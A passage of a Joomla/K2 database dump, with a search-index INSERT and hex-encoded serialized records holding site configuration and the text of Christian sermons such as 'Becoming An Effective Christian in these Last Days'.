733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2237223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a31313a2231363a6661746865722d73223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a32393a22636f6d706f6e656e742f6b322f6974656d2f31362d6661746865722d73223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3136223b733a353a22726f757465223b733a34383a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d31363a6661746865722d73223b733a353a227469746c65223b733a32373a224661746865722773204865617274202831352f30312f3230313729223b733a31313a226465736372697074696f6e223b733a3238373a2220446561726c792062656c6f7665642c2054616b65206e6f7465206f662074686520666f6c6c6f77696e67207468696e6773207468617420796f75206d7573742074616b6520616c6f6e6720617320796f7520676f20696e746f20323031373a20312e205468652053776f7264206f6620746865205370697269743a204c6f616420796f757273656c66207769746820776f7264732066726f6d20476f6420617320796f752061726520676f696e6720696e746f2074686520796561722e20576861746576657220796f757220776f726b206973e280956120646f63746f722c20612062616e6b65722c206120627573696e657373206d616ee280956c6f616420796f757273656c66207769746820776f7264732066726f6d20476f642e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30312d31352030393a33353a3333223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30312d31352030393a33353a3333223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(238, 'index.php?option=com_k2&view=item&id=17', 'index.php?option=com_k2&view=item&id=17:becoming-an-effective-christian-in-these-last-days', 'Becoming An Effective Christian in these Last Days', ' Luke 13:6-9, John 15:8, 16, Matthew 25:14-30 You will be amazed that God frowns at an unfruitful child. He is not coming to judge only the sinners, the Lord is coming also for the unfruitful Christians, He calls them wicked servants (Luke 19:20-24). Even Jesus had to curse a fig tree that had only leaves but without any fruits to show for it. A Christian should not only be full of activities but be full of results. ', '2017-06-25 14:18:22', 'cdb0d4538935e70d851153ea714eb382', 1, 1, 1, '*', '2017-01-22 08:57:08', '0000-00-00 00:00:00', '2017-01-22 08:57:08', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223137223b733a353a22616c696173223b733a35303a226265636f6d696e672d616e2d6566666563746976652d63687269737469616e2d696e2d74686573652d6c6173742d64617973223b733a373a2273756d6d617279223b733a3433353a223c703e4c756b652031333a362d392c204a6f686e2031353a382c2031362c204d6174746865772032353a31342d33303c2f703e0d0a3c703e596f752077696c6c20626520616d617a6564207468617420476f642066726f776e7320617420616e20756e667275697466756c206368696c642e204865206973206e6f7420636f6d696e6720746f206a75646765206f6e6c79207468652073696e6e6572732c20746865204c6f726420697320636f6d696e6720616c736f20666f722074686520756e667275697466756c2043687269737469616e732c2048652063616c6c73207468656d207769636b65642073657276616e747320284c756b652031393a32302d3234292e204576656e204a657375732068616420746f2063757273652061206669672074726565207468617420686164206f6e6c79206c65617665732062757420776974686f757420616e792066727569747320746f2073686f7720666f722069742e20412043687269737469616e2073686f756c64206e6f74206f6e6c792062652066756c6c206f662061637469766974696573206275742062652066756c6c206f6620726573756c74732e3c2f703e0d0a223b733a343a22626f6479223b733a343336363a220d0a3c703e54686520646179207468617420476f6420697320636f6d696e6720666f7220796f75206974e28099732074686520726573756c747320746861742048652077696c6c20636f6d6520666f722e2054686520626f6479206f662043687269737420746f6461792069732066696c6c656420776974682070656f706c65207468617420617265206f6363757069656420627920616374697669746965732c2065766572796f6e65206b6e6f7773207468617420746865792061726520646f696e6720736f6d657468696e672062757420746865792068617665206e6f7468696e6720746f2073686f7720666f722069742e3c2f703e0d0a3c703e546865206672756974206f66207269676874656f75736e65737320697320686f6c696e6573732c20746865206672756974206f66206576616e67656c69736d2069732073616c766174696f6e206f6620736f756c732c20746865206672756974206f6620696e74657263657373696f6e20697320646976696e6520696e74657276656e74696f6e20616e6420696e74657272757074696f6e2c20746865206672756974206f66206b6e6f776c6564676520697320756e6465727374616e64696e672c20746865206672756974206f6620666f6c6c6f772d7570206973206d656d626572736869702c20746865206672756974206f6620796f757220636875726368206d656d6265727368697020697320612064657374696e7920666f726d6174696f6e20696e20796f752e20536570617261746520616374697669746965732066726f6d20726573756c74732c2073746f702077617374696e6720796f75722074696d65207769746820616374697669746965732c20676f20666f7220726573756c74732e20546865204661746865722072656a6f69636573207768656e20486973206368696c6472656e2070726f647563652066727569742c2048652074616b6573207370656369616c206361726520746f207072756e652c20746f20636c65616e73652c2074686f73652077686f206272696e6720667275697420736f20746861742074686579206272696e67206d6f72652120486520646f6573206e6f742077616e7420746f206a75737420686176652076696e65206272616e636865733b2048652077616e747320746f206861766520667275697466756c206272616e636865732c206272616e636865732074686174206769766520667275697420746f2074686569722066756c6c20706f74656e7469616c2e204a6f686e2031353a312d323c2f703e0d0a3c703e41637469766974696573206172652077686174206d656e207365652062757420726573756c74206973207768617420476f64206a75646765732e20496e20322053616d75656c20353a312d332c2074686520656c64657273206f662049737261656c2063616d6520746f20446176696420616e6420736169642c207768656e205361756c20776173206b696e67206f766572207468656d2c2068652077617320746865206f6e652074686174206c6564207468656d206f757420616e6420696e2e205361756c2077617320746865206c6561646572206f6e20746865207468726f6e652062757420617320666172206173207768617420476f642077617320646f696e672077617320636f6e6365726e65642c2044617669642077617320746865207265636f676e697a6564206c65616465722e20476f642077617320707265706172696e6720446176696420746f2062652061207265706c6163656d656e7420666f72205361756c2c206265636175736520686520686164206e6f20636f6e747269627574696f6e20746f20476f64277320707572706f73652e2049742773206e6f7420656e6f756768207468617420796f75277265206c656164696e67206120636f6d6d69747465652c206f72207468617420746865726520697320616e2061737369676e6d656e7420796f752061726520636f6f7264696e6174696e672c20796f75206d7573742062652073757265207468617420796f75206172652077696e6e696e672074686520706c656173757265206f6620476f642074686572652e20496620796f752077696c6c206e6f742062652061207265706c61636561626c65206d6174657269616c20796f75206d75737420626520636f6d6d697474656420746f2070726f647563696e6720726573756c74732e3c2f703e0d0a3c703e486f7720746f20626520612043687269737469616e207769746820526573756c74733a3c2f703e0d0a3c703e312e20c2a020c2a020c2a0507261796572732e204c756b6520353a31362d32342c204d61726b20313a33352d34322c3c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a041206d616a6f72206d697261636c6520616c7761797320666f6c6c6f7773207768656e65766572204a657375732077697468647265772048696d73656c6620746f20707261792e3c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a0497420746f6f6b2070726179657273206f66207468652041706f73746c657320696e204163747320343a33312d333720746f206272696e672061626f757420746865206b696e64206f66206c6f76652074686174206272696e672061626f7574207468652068617276657374206f66206d756c746974756465206f662062656c6965766572732e20466f7220616e79206c61626f757220746f207969656c6420667275697473206974206d75737420626520646f6e6520696e206c6f76652e2041766f69642074686520776f726b73206f662074686520666c6573682e2047616c20353a2031392d32312e3c2f703e0d0a3c703e322e20c2a020c2a020c2a0466169746866756c6e657373204e4f54206661636566756c6e6573732e204d6174746865772032343a34352d34372c204c756b652031363a31302d31323c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a0476f64207265776172647320666169746866756c6e657373206e6f742065796520736572766963652e3c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a04661636566756c6e6573732063616e206769766520796f752061207469746c652062757420796f752077696c6c206e65656420666169746866756c6e65737320746f20636172727920746865206c69666520616e642074686520616e6f696e74696e6720666f722061737369676e6d656e74732e3c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a0456c6961622068616420746865206f75746c6f6f6b206275742044617669642068616420746865206c69666520616e642074686520747261696e696e672e20476f20666f7220746865206c696665213c2f703e0d0a3c703e332e20c2a020c2a020c2a0576973646f6d3a2050726f76657262732032343a332c204563636c2031303a31303c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a05768656e20476f64206769766573207765206761746865722c20616e642069742074616b657320776973646f6d20746f206761746865722e3c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a0546865726520697320776973646f6d20746f20617070726f61636820616e2061737369676e6d656e74732c2065766572792061737369676e6d656e7420686173206974732073747261746567792e3c2f703e0d0a3c703e342e20c2a020c2a020c2a0496e74696d616379207769746820746865206661746865722e204a6f686e2031353a342d353c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a0546869732077696c6c2062697274682061636375726163793c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a04b6e6f77696e67207468652072696768742061637469766974792c20746865207269676874206d6574686f642c20616e64207468652072696768742074696d696e672e2044617669642077696c6c20616c7761797320656e7175697265206f6620746865204c6f7264207768656e6576657220746865697220697320626174746c652e3c2f703e0d0a3c703e352e20c2a020c2a020c2a04265206120536f6c6f6d6f6e20616e64206e6f7420616e20416273616c6f6d20696e20796f757220666174686572e280997320686f7573652e3c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a0322053616d75656c2031353a312d362c20322053616d75656c2031383a31382d416273616c6f6d2073746f6c6520746865206865617274206f6620616c6c2049737261656c697465732e2048652063686173656420686973206661746865722066726f6d20746865207468726f6e652c2077616e74696e6720686973206f776e2e20497473206120737472616e676520736f6e2074686174206275696c64732061206d6f6e756d656e7420666f722068696d73656c6620696e2068697320666174686572277320686f7573652e20536f6c6f6d6f6e206275696c74207468652074656d706c65206163636f7264696e6720746f20746865207061747465726e207468617420686973206661746865722072656365697665642c20616e642074686520676c6f7279206f6620746865204c6f72642063616d6520756e746f207468652074656d706c652e31204368722032383a31392c2031204b696e677320363a33382c2031204b696e677320383a31302d31312e3c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a047656e657369732032363a31382d497361616320646964206e6f7420646967206e65772077656c6c732c20486520647567207468652077656c6c73207468617420686973206661746865722068616420647567206265666f726520616e642063616c6c6564207468656d207468652073616d65206e616d6573207468617420686973206661746865722063616c6c6564207468656d2e20416e6420796f7520636f756c6420736565207468617420616c6c207468652077656c6c732062726f7567687420666f7274682077617465722e3c2f703e0d0a3c703e362e20c2a020c2a020c2a0446f2061737369676e6d656e7473206163636f7264696e6720746f20746865206361706163697479206f6620796f75722067726163652c206162696c69747920616e6420706f74656e7469616c732e204d6174746865772032353a31342d33303c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a05361756ce28099732061726d6f75722077696c6c206e6f7420776f726b20666f722044617669642c20697420697320796f757220677261636520616e64207370656369616c206162696c6974792074686174206d616b657320796f752064697374696e63742e3c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a0446f6ee280997420636f6d7065746520696e2074686520706c616365206f662061737369676e6d656e74732e3c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a0446f6ee280997420636f6d7061726520796f757273656c66207769746820616e6f746865722e3c2f703e0d0a3c703e2d20c2a020c2a020c2a020c2a020c2a0446f6ee28099742075736520616e6f7468657220706572736f6ee2809973207374796c652c20626520796f757273656c662e3c2f703e0d0a3c703e546865206861727665737420697320706c656e746966756c2c20627574206c61626f757265727320617265206665772e20476f64206973206c6f6f6b696e6720666f7220726561706572732c2063616e20476f6420646570656e64206f6e20796f7520617320612072656170657220696e207468697320656e642074696d653f2057696c6c20796f752062652061626c6520746f206272696e6720666f7274682074686520667275697420746861742077696c6c206c6173743f204d617920796f75206e6f74206469736170706f696e74207468652068656176656e6c7920747275737420696e20796f75722064617928416d656e292e3c2f703e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30312d32392031303a32333a3536223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223